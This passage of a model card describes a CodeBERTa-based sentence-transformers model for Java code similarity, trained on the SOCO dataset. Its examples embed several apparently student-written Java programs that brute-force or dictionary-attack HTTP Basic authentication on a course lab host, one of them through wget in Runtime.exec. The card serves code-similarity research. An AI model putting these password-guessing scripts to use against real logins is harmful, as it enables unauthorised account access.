\n\t\t\t\t\tdivValue = count % NUMBER_OF_GETS_BEFORE_RELEASE;\n\n\n\t\t\t\t\t\
if (divValue == 0) {\n\n\t\t\t\t\t\tSystem.out.println(\"Count: \"+ count+ \"\
\ Div Value: \"+ divValue+ \" Releasing the connection and getting new one\");\n\
\t\t\t\t\t\tgetMethod.releaseConnection();\n\t\t\t\t\t\tgetMethod = null;\n\t\t\
\t\t\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\n\t\t\t\t\t}\n\n\t\t\t\
\ client.executeMethod(getMethod);\n\t\t\t statusLine = getMethod.getStatusLine().toString();\n\
\n\t\t\t\t\tif (statusLine.compareTo(\"HTTP/1.1 200 OK\") == 0) {\n\t\t\t\t\t\t\
System.out.println(\"Found the user name and password for the site. The username\
\ is: \"+ userName+ \" and the password is: \"+ password);\n\t\t\t\t\t\tSystem.exit(0);\n\
\t\t\t\t\t}\n\t\t\t }\n\t\t\t}\n\t\t}\n }\n}\n"
- "import java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class Dictionary\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ String file = \"/usr/share/lib/dict/words\";\n String word;\n char[]\
\ password = new char[MAX_LENGTH];\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n while (!auth) {\n \n BufferedReader in = null;\n \
\ try {\n \n in = new BufferedReader(new FileReader(file));\n\
\ while ((word = in.readLine()) != null && !auth) {\n \
\ try {\n if (word.length() <= MAX_LENGTH) {\n \
\ password = word.toCharArray();\n \n \
\ Authenticator.setDefault(new CrackAuth(password));\n \
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n \
\ }\n } catch (Exception e) {\n System.out.println(\"\
\ was exception: \" + e.getMessage());\n }\n }\n\n \
\ \n } catch (FileNotFoundException fnfe) {\n System.out.println(\"\
File Not Found\");\n } catch (IOException ioe) {\n System.out.println(\"\
IOException\");\n } catch(Exception e) {\n e.printStackTrace();\n\
\ } finally {\n try {\n in.close();\n \
\ } catch (Exception e) {;}\n }\n\n\n }\n if (!auth) {\n\
\ System.out.println(\"Unable determine password\");\n } else {\n\
\ time = (new Date()).getTime() - start.getTime();\n System.out.println(\"\
it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n\
\ }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n\
\ public CrackAuth(char[] password) {\n this.password = password;\n }\n\
\n protected PasswordAuthentication getPasswordAuthentication()\n {\n \
\ String user = \"\";\n return new PasswordAuthentication(user, password);\n\
\ }\n}\n"
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n\
{\n private final static char base64Array [] = {\n 'A', 'B', 'C', 'D',\
\ 'E', 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n \
\ 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b',\
\ 'c', 'd', 'e', 'f',\n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n \
\ 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z',\
\ '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9', '+', '/'\n \
\ };\n\n public static String encode (String string)\n {\n String encodedString\
\ = \"\";\n byte bytes [] = string.getBytes ();\n int i = 0;\n \
\ int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes\
\ [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n\
\ {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else\n {\n b2 = bytes [i++];\n \
\ if (i >= bytes.length)\n {\n b3 = 0;\n \
\ pad = 1;\n }\n else\n b3 = bytes\
\ [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2\
\ = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf)\
\ << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n \
\ switch (pad)\n {\n case 0:\n encodedString\
\ += base64Array [c3];\n encodedString += base64Array [c4];\n \
\ break;\n case 1:\n encodedString += base64Array\
\ [c3];\n encodedString += \"=\";\n break;\n \
\ case 2:\n encodedString += \"==\";\n break;\n\
\ }\n }\n return encodedString;\n }\n}\n"
sentences:
- "\nimport java.net.*; \nimport java.io.*; \npublic class BruteForce {\nprivate\
\ static String password=\" \"; \n\n \n public static void main(String[]\
\ args) {\n\t String Result=\"\"; \n\t if (args.length<1)\n\t\t\t {\n\t\t\t\
\ System.out.println(\"Error: Correct Format Filename, username e.g<>\"); \n\
\t\t\t\tSystem.exit(1);\t\n\t\t\t }\n\t\t\t BruteForce bruteForce1 = new BruteForce();\n\
\t\t\t Result=bruteForce1.Password(\"http://sec-crack.cs.rmit.edu./SEC/2/\",args[0]);\
\ \n\t\t\t System.out.println(\"The Password of \"+args[0]+\"is..\"+Result);\
\ \n\t\t\t \n\t\t }\n\n\n\n private String Password(String urlString,String\
\ username) \n { \n int cnt=0;\n \n t0 = System.currentTimeMillis(); \n for\
\ ( char ch = 'A'; ch <= 'z'; ch++ )\n { \n\t\t\t\t\t\t if (ch>'Z' && ch<'a')\n\
\t\t\t\t\t\t { \n\t\t\t\t\t\t ch='a'; \n\t\t\t\t\t\t } \n\t\t\t\t\n\t\t\t\t\
for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )\n\t\t\t\t { \n\t\t\t\t\t \n\t\t\t\
\t\t\tif (ch1>'Z' && ch1<'a')\n\t\t\t\t\t\t { \n\t\t\t\t\t\t ch1='a'; \n\t\t\
\t\t\t\t }\n\n\n\t\t\t\t\t for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )\n\t\t\t\
\t\t\t { \n\t\t\t\t\t\t\tif (ch2>'Z' && ch2<'a')\n\t\t\t\t\t\t { \n\t\t\t\t\t\t\
\ ch2='a'; \n\t\t\t\t\t\t }\n\t\t\t\t\t\t\tpassword=String.valueOf(ch)+String.valueOf(ch1)+String.valueOf(ch2);\n\
\t\t\t\t\t\t\t\tSystem.out.print(\"crackin...:\"); \n\t\t\t\t\t \tSystem.out.print(\"\
\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\" ); \n\t\t\t\t\t\ttry\n\t\t\t\t\t\t{\n\t\t\t\
\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tURL url = new URL (urlString);\n\t\t\t\tString\
\ userPassword=username+\":\"+password; \n\n \n\t\t String encoding =\
\ new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\t\t\t URLConnection\
\ conc= url.openConnection(); \n\t\t\t\t\t conc.setRequestProperty (\"Authorization\"\
, \" \" + encoding);\t\t\t \n\t\t\t\t\t conc.connect(); \n\t\t\t\t\t\tcnt++;\n\
\t\t\t\t\t if (conc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200\
\ OK\"))\n\t\t\t\t\t\t {\n\t\t\t\t\t\t\t t1 = System.currentTimeMillis(); \n\t\
\t\t\t\t\t\t net=t1-t0; \n\t\t\t\t\t\t\tSystem.out.println(\"\
The Number of Attempts \"+cnt); \n\t\t\t\t\t\t\tSystem.out.println(\"Total Time\
\ Taken in secs\"+net/1000); \n\t\t\t\t\t\t\treturn password; \n\t\t\t\t\t\t\
}\n\t\t\t\t\t\n\t\t\t\t}\n\n\t\t \tcatch (Exception e )\n\t\t\t\t{\n\t\t\t\
\t e.printStackTrace(); \n\n\t\t\t\t}\n\n\t\t\t\n\t\t \n\t\t \n\t\t }\n\
\t\t \n\n\n\n \n \n\t } \n \n \n\t\
} \n return \"Password could not found\"; \n\n }\n\n\n}"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\nimport java.awt.*;\nimport java.net.*;\n\npublic class BruteForce\n\
{\n\tpublic static void main (String[] args)\n\t{\n\t\tString pw = new String();\n\
\t\tpw = getPassword ();\n\t\tSystem.out.println(\"Password is: \"+pw);\n\t}\n\
\tpublic static String getPassword()\n\t{\n\t\tString passWord = new String();\n\
\t\tpassWord = \"AAA\";\n\t\tchar[] guess = passWord.toCharArray();\n\t\tProcess\
\ pro = null;\n\t\tRuntime runtime = Runtime.getRuntime();\n\t\tBufferedReader\
\ in = null;\n\t\tString str=null;\n\t\tboolean found = true;\n\n\t\tSystem.out.println(\"\
\ attacking.....\");\n\t\tfor (int i=65;i<=122 ;i++ )\n\t\t{\n\t\t\tguess[0]=(char)(i);\n\
\ for (int j=65;j<=122 ;j++ )\n\t\t\t{\n\t\t\t\tguess[1]=(char)(j);\n\
\ for (int k=65 ;k<=122 ;k++ )\n\t\t\t\t{\n\t\t\t\t\tguess[2]=(char)(k);\n\
\t\t\t\t\tpassWord = new String(guess);\n\t\t\t\t\tString cmd = \"wget --http-user=\
\ --http-passwd=\"+passWord +\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\
\ \";\n\t\t\t\t\ttry\n\t\t\t\t\t{\n\t\t\t\t\t\tpro = runtime.exec(cmd);\n\n\t\t\
\t\t\t\tin = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\
\t\t\t\t\t\tfound = true;\n\t\t\t\t\t\tif((str=in.readLine())!=null)\n\t\t\t\t\
\t\t{\n\t\t\t\t\t\t\twhile ((str=in.readLine())!=null)\n\t\t\t\t\t\t\t{\n\t\t\t\
\t\t\t\t\tif (str.endsWith(\"Required\"))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\
\tfound = false;\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif (found\
\ == true)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn passWord;\n\t\t\t\t\t\t\t\
}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tcatch (Exception exception)\n\t\t\t\t\
\t{\n\t\t\t\t\t exception.getMessage();\n\t\t\t\t\t}\n\t\t\t\t\tif(k==90)\n\
\t\t\t\t\t\tk=96;\n\t\t\t\t\truntime.gc();\n\t\t\t\t}\n\t\t\t\tif(j==90)\n\t\t\
\t\t\tj=96;\n\t\t\t}\n\t\t\tif(i==90)\n\t\t\t\ti=96;\n\t\t}\n\t\treturn \"not\
\ found\";\n\t}\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs256-lr5e-05-split0.2")
# Run inference
sentences = [
'\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n{\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n public static String encode (String string)\n {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else\n {\n b2 = bytes [i++];\n if (i >= bytes.length)\n {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad)\n {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n}\n',
'import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce {\n\n URLConnection conn = null;\n private static boolean status = false;\n\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n String[] inp = {"http://sec-crack.cs.rmit.edu./SEC/2/index.php",\n \t\t\t\t "",\n \t\t\t\t ""};\n int attempts = 0;\n exit:\n for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++) {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] == \' \' && pwdArray[j] != \' \') continue;\n\t\t\t\t if (pwdArray[j] == \' \' && pwdArray[k] != \' \') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\t\t\t\t\t System.out.println("Crrect password is: " + inp[2]);\n\t\t\t\t\t System.out.println("Number of attempts = " + attempts);\n\t\t\t\t\t break exit;\n\t\t\t \t }\n \t\t\t inp[2] = "";\n\t\t \t }\n\t \t }\n }\n }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader in = new BufferedReader(\n new InputStreamReader\n (connectURL(new URL(args[0]), args[1], args[2])));\n String line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n status = true;\n }\n }\n catch (IOException e) {\n \n }\n }\n\n public InputStream connectURL (URL url, String uname, String pword)\n throws IOException {\n conn = url.openConnection();\n conn.setRequestProperty ("Authorization",\n userNamePasswordBase64(uname,pword));\n conn.connect ();\n return conn.getInputStream();\n }\n\n public String userNamePasswordBase64(String username, String password) {\n return " " + base64Encode (username + ":" + password);\n }\n\n private final static char pwdArray [] = {\n\t \'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \'g\', \'h\',\n\t \'i\', \'j\', \'k\', \'l\', \'m\', \'n\', \'o\', \'p\',\n\t \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \'w\', \'x\',\n\t \'y\', \'z\', \'A\', \'B\', \'C\', \'D\', \'E\', \'F\',\n\t \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\', \'N\',\n\t \'O\', \'P\', \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\',\n\t \'W\', \'X\', \'Y\', \'Z\', \' \'\n };\n\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n private static String base64Encode (String string) {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length) {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad) {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n }\n\n',
'\nimport java.io.*;\nimport java.awt.*;\nimport java.net.*;\n\npublic class BruteForce\n{\n\tpublic static void main (String[] args)\n\t{\n\t\tString pw = new String();\n\t\tpw = getPassword ();\n\t\tSystem.out.println("Password is: "+pw);\n\t}\n\tpublic static String getPassword()\n\t{\n\t\tString passWord = new String();\n\t\tpassWord = "AAA";\n\t\tchar[] guess = passWord.toCharArray();\n\t\tProcess pro = null;\n\t\tRuntime runtime = Runtime.getRuntime();\n\t\tBufferedReader in = null;\n\t\tString str=null;\n\t\tboolean found = true;\n\n\t\tSystem.out.println(" attacking.....");\n\t\tfor (int i=65;i<=122 ;i++ )\n\t\t{\n\t\t\tguess[0]=(char)(i);\n for (int j=65;j<=122 ;j++ )\n\t\t\t{\n\t\t\t\tguess[1]=(char)(j);\n for (int k=65 ;k<=122 ;k++ )\n\t\t\t\t{\n\t\t\t\t\tguess[2]=(char)(k);\n\t\t\t\t\tpassWord = new String(guess);\n\t\t\t\t\tString cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";\n\t\t\t\t\ttry\n\t\t\t\t\t{\n\t\t\t\t\t\tpro = runtime.exec(cmd);\n\n\t\t\t\t\t\tin = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\t\t\t\t\t\tfound = true;\n\t\t\t\t\t\tif((str=in.readLine())!=null)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\twhile ((str=in.readLine())!=null)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (str.endsWith("Required"))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tfound = false;\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif (found == true)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn passWord;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tcatch (Exception exception)\n\t\t\t\t\t{\n\t\t\t\t\t exception.getMessage();\n\t\t\t\t\t}\n\t\t\t\t\tif(k==90)\n\t\t\t\t\t\tk=96;\n\t\t\t\t\truntime.gc();\n\t\t\t\t}\n\t\t\t\tif(j==90)\n\t\t\t\t\tj=96;\n\t\t\t}\n\t\t\tif(i==90)\n\t\t\t\ti=96;\n\t\t}\n\t\treturn "not found";\n\t}\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9549, 0.5951],
# [0.9549, 1.0000, 0.5695],
# [0.5951, 0.5695, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 34,368 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.94 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 466.25 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.71 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>import java.util.*;<br>import java.io.*;<br><br><br><br>public class WatchDog {<br><br> public WatchDog() {<br><br> }<br> public static void main(String args[]) {<br> DataInputStream newin;<br><br> try{<br><br><br> System.out.println("Downloading first copy");<br> Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");<br> String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};<br> String[] cmdMail = {"//sh", "-c", "mailx -s \"Diffrence\" \"@cs.rmit.edu.\" < Diff.txt"};<br> while(true){<br> Thread.sleep(24*60*60*1000);<br> System.out.println("Downloading new copy");<br> Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");<br> Thread.sleep(2000);<br> Runtime.getRuntime().exec(cmdDiff);<br> Thread.sleep(2000);<br> newin = new DataInputStream( new FileInputStream( "Diff.txt"));<br> if (newin.readLine() != null){<br> System.out.println("Sending Mail");<br> ...</code> | <code>import java.util.*;<br>import java.io.*;<br>import javax.swing.text.html.*;<br><br><br>public class WatchDog {<br><br> public WatchDog() {<br><br> }<br> public static void main (String args[]) {<br> DataInputStream newin;<br><br> try{<br> System.out.println("ishti");<br><br> System.out.println("Downloading first copy");<br> Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");<br> String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};<br> String[] cmdMail = {"//sh", "-c", "mailx -s \"Diffrence\" \"@cs.rmit.edu.\" < Diff.txt"};<br> while(true){<br> Thread.sleep(24*60*60*1000);<br> System.out.println("Downloading new copy");<br> Runtime.getRuntime().exec("wget 